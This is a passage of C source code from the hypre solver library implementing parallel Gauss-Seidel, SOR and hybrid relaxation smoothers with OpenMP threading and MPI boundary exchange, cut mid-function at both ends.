#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
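                  /*-----------------------------------------------------------
                   * Partition the n rows into num_threads contiguous blocks
                   * [ns, ne): each block gets n/num_threads rows, and the
                   * first n % num_threads blocks get one extra row.
                   *-----------------------------------------------------------*/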
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
res -= A_diag_data[jj] * u_data[ii];
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points && A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
res -= A_diag_data[jj] * u_data[ii];
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points && A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
}
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
prod = (1.0-relax_weight*omega);
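            /*-----------------------------------------------------------------
             * Weighted SOR update with outer weight w = relax_weight and
             * inner parameter omega:
             *
             *    u_i <- (1 - w*omega)*u_i
             *         + w*( omega*res + res0 + (1-omega)*res2 ) / A_ii,
             *
             * where res accumulates f_i minus couplings to off-block and
             * off-processor values, res0 accumulates -A_ij*u_j over fresh
             * in-block values, and res2 accumulates +A_ij*Vtemp_j over
             * the old iterate.
             *-----------------------------------------------------------------*/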
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 + one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 + one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
}
#ifndef HYPRE_USING_PERSISTENT_COMM
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
#endif
#ifdef HYPRE_PROFILE
hypre_profile_times[HYPRE_TIMER_ID_RELAX] += hypre_MPI_Wtime();
#endif
}
break;
      case 1: /* Gauss-Seidel, fully sequential across processes -- VERY SLOW */
{
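         /*-----------------------------------------------------------------
          * Fully sequential Gauss-Seidel: the processes take turns in
          * rank order p = 0, ..., num_procs-1.  While it is not rank p's
          * turn, the others only send p their boundary values; rank p
          * receives them, relaxes all of its rows using the latest data,
          * and the barrier hands the turn to the next rank.  This gives
          * an exact global GS sweep at the cost of full serialization.
          *-----------------------------------------------------------------*/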
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
num_recvs = hypre_ParCSRCommPkgNumRecvs(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
status = hypre_CTAlloc(hypre_MPI_Status, num_recvs+num_sends, HYPRE_MEMORY_HOST);
            requests = hypre_CTAlloc(hypre_MPI_Request, num_recvs+num_sends, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
            /*-----------------------------------------------------------------
             * No temporary copy of the current approximation is needed:
             * Gauss-Seidel updates u_data in place.
             *-----------------------------------------------------------------*/
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
for (p = 0; p < num_procs; p++)
{
jr = 0;
if (p != my_id)
{
for (i = 0; i < num_sends; i++)
{
ip = hypre_ParCSRCommPkgSendProc(comm_pkg, i);
if (ip == p)
{
vec_start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
vec_len = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i+1)-vec_start;
for (j=vec_start; j < vec_start+vec_len; j++)
v_buf_data[j] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
hypre_MPI_Isend(&v_buf_data[vec_start], vec_len, HYPRE_MPI_REAL,
ip, 0, comm, &requests[jr++]);
}
}
hypre_MPI_Waitall(jr,requests,status);
hypre_MPI_Barrier(comm);
}
else
{
if (num_procs > 1)
{
for (i = 0; i < num_recvs; i++)
{
ip = hypre_ParCSRCommPkgRecvProc(comm_pkg, i);
vec_start = hypre_ParCSRCommPkgRecvVecStart(comm_pkg,i);
vec_len = hypre_ParCSRCommPkgRecvVecStart(comm_pkg,i+1)-vec_start;
hypre_MPI_Irecv(&Vext_data[vec_start], vec_len, HYPRE_MPI_REAL,
ip, 0, comm, &requests[jr++]);
}
hypre_MPI_Waitall(jr,requests,status);
}
if (relax_points == 0)
{
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
if (num_procs > 1)
hypre_MPI_Barrier(comm);
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
hypre_TFree(status, HYPRE_MEMORY_HOST);
hypre_TFree(requests, HYPRE_MEMORY_HOST);
}
}
break;
case 2: /* Gauss-Seidel: relax interior points in parallel, boundary
sequentially */
{
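         /*-----------------------------------------------------------------
          * Two-phase Gauss-Seidel: rows with no off-processor couplings
          * ("interior" rows) are relaxed first, concurrently on all
          * processes; the remaining boundary rows are then swept
          * sequentially in rank order, as in relax_type = 1.
          *-----------------------------------------------------------------*/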
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
num_recvs = hypre_ParCSRCommPkgNumRecvs(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
status = hypre_CTAlloc(hypre_MPI_Status, num_recvs+num_sends, HYPRE_MEMORY_HOST);
            requests = hypre_CTAlloc(hypre_MPI_Request, num_recvs+num_sends, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
}
         /*-----------------------------------------------------------------
          * No temporary copy of the current approximation is needed:
          * Gauss-Seidel updates u_data in place.
          *-----------------------------------------------------------------*/
/*-----------------------------------------------------------------
* Relax interior points first
*-----------------------------------------------------------------*/
if (relax_points == 0)
{
for (i = 0; i < n; i++)
{
               /*-----------------------------------------------------------
                * If i is an interior point (no off-processor couplings)
                * and its diagonal is nonzero, relax point i; otherwise,
                * skip it.
                *-----------------------------------------------------------*/
if ((A_offd_i[i+1]-A_offd_i[i]) == zero &&
A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
else
{
for (i = 0; i < n; i++)
{
               /*-----------------------------------------------------------
                * If i is an interior point of the right type ( C or F )
                * and its diagonal is nonzero, relax point i; otherwise,
                * skip it.
                *-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& (A_offd_i[i+1]-A_offd_i[i]) == zero
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
for (p = 0; p < num_procs; p++)
{
jr = 0;
if (p != my_id)
{
for (i = 0; i < num_sends; i++)
{
ip = hypre_ParCSRCommPkgSendProc(comm_pkg, i);
if (ip == p)
{
vec_start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
vec_len = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i+1)-vec_start;
for (j=vec_start; j < vec_start+vec_len; j++)
v_buf_data[j] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
hypre_MPI_Isend(&v_buf_data[vec_start], vec_len, HYPRE_MPI_REAL,
ip, 0, comm, &requests[jr++]);
}
}
hypre_MPI_Waitall(jr,requests,status);
hypre_MPI_Barrier(comm);
}
else
{
if (num_procs > 1)
{
for (i = 0; i < num_recvs; i++)
{
ip = hypre_ParCSRCommPkgRecvProc(comm_pkg, i);
vec_start = hypre_ParCSRCommPkgRecvVecStart(comm_pkg,i);
vec_len = hypre_ParCSRCommPkgRecvVecStart(comm_pkg,i+1)-vec_start;
hypre_MPI_Irecv(&Vext_data[vec_start], vec_len, HYPRE_MPI_REAL,
ip, 0, comm, &requests[jr++]);
}
hypre_MPI_Waitall(jr,requests,status);
}
if (relax_points == 0)
{
for (i = 0; i < n; i++)
{
                  /*-----------------------------------------------------------
                   * If i is a boundary point (with off-processor couplings)
                   * and its diagonal is nonzero, relax point i; otherwise,
                   * skip it.
                   *-----------------------------------------------------------*/
if ((A_offd_i[i+1]-A_offd_i[i]) != zero &&
A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
for (i = 0; i < n; i++)
{
                  /*-----------------------------------------------------------
                   * If i is a boundary point of the right type ( C or F )
                   * and its diagonal is nonzero, relax point i; otherwise,
                   * skip it.
                   *-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& (A_offd_i[i+1]-A_offd_i[i]) != zero
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
if (num_procs > 1)
hypre_MPI_Barrier(comm);
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
hypre_TFree(status, HYPRE_MEMORY_HOST);
hypre_TFree(requests, HYPRE_MEMORY_HOST);
}
}
break;
case 4: /* Hybrid: Jacobi off-processor,
Gauss-Seidel/SOR on-processor
(backward loop) */
{
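         /*-----------------------------------------------------------------
          * Same scheme as relax_type = 3, but as a backward sweep: within
          * each thread block the rows are relaxed in decreasing order
          * (i = ne-1, ..., ns).  A forward sweep (3) followed by a
          * backward sweep (4) yields a symmetric smoother.
          *-----------------------------------------------------------------*/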
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg,i+1); j++)
v_buf_data[index++]
= u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data,
Vext_data);
            /*-----------------------------------------------------------------
             * Complete the halo exchange so that Vext_data holds the
             * off-processor values of u.
             *-----------------------------------------------------------------*/
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_weight == 1 && omega == 1)
{
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = hypre_CTAlloc(HYPRE_Real, n, HYPRE_MEMORY_HOST);
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
res -= A_diag_data[jj] * u_data[ii];
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
hypre_TFree(tmp_data, HYPRE_MEMORY_HOST);
}
else
{
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = hypre_CTAlloc(HYPRE_Real, n, HYPRE_MEMORY_HOST);
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
res -= A_diag_data[jj] * u_data[ii];
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
hypre_TFree(tmp_data, HYPRE_MEMORY_HOST);
}
else
{
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
}
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
prod = (1.0-relax_weight*omega);
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = hypre_CTAlloc(HYPRE_Real, n, HYPRE_MEMORY_HOST);
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
hypre_TFree(tmp_data, HYPRE_MEMORY_HOST);
}
else
{
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = hypre_CTAlloc(HYPRE_Real, n, HYPRE_MEMORY_HOST);
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,res0,res2,rest,size) HYPRE_SMP_SCHEDULE
#endif
